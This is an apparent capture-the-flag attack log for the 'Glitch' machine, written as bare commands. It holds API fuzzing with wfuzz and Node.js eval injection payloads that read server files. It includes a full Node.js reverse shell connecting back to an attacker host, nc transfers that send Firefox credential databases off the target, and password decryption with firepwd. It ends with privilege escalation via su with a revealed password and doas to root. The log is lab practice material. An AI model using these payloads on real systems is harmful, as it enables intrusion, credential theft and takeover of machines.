My attack chain for Glitch. API Fuzzing to NodeJS RCE. Decrypting Firefox passwords
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
|
export ip=<redacted>
firefox http://$ip
firefox http://$ip/api/access
# add this_is_not_real cookie in the page
firefox http://$ip
firefox http://$ip/js/script.js
# fuzz API parameters
wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt -X POST --hc 400 -u http://$ip/api/items\?FUZZ\=test
# EXPLOIT node js eval check
firefox http://$ip/api/item?cmd=1
api/item?cmd=process.cwd()
api/item?cmd=var fs=require("fs");fs.readdirSync("/var/web").toString('utf8')
api/item?cmd=var fs=require("fs");fs.readFileSync("/var/web/app.js").toString('utf8')
# view api.js
/api/items?cmd=var+fs%3drequire("fs")%3bfs.readFileSync("/var/web/routes/api.js").toString('utf8')
# ACCESS: reverse shell
api/item?cmd=(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4444, "<sanitized>", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();
# target-machine
python3 -c 'import pty; pty.spawn("/bin/bash")'
cat /home/user/user.txt
cd /home/user/.firefox
# HORIZONTAL PRIVESC: firefox keys
# transferring firefox keys
nc -l -p 1234 > key4.db < /dev/null
nc -nv <redacted> 1234 < key4.db
nc -l -p 1234 > logins.json < /dev/null
nc -nv <redacted> 1234 < logins.json
# firepwd firefox
python firepwd.py -d /
su v0id # pass: love_the_void
# VERTICAL PRIVESC: doas
doas -u root whoami
doas -u root /bin/bash
cat /root/root.txt
|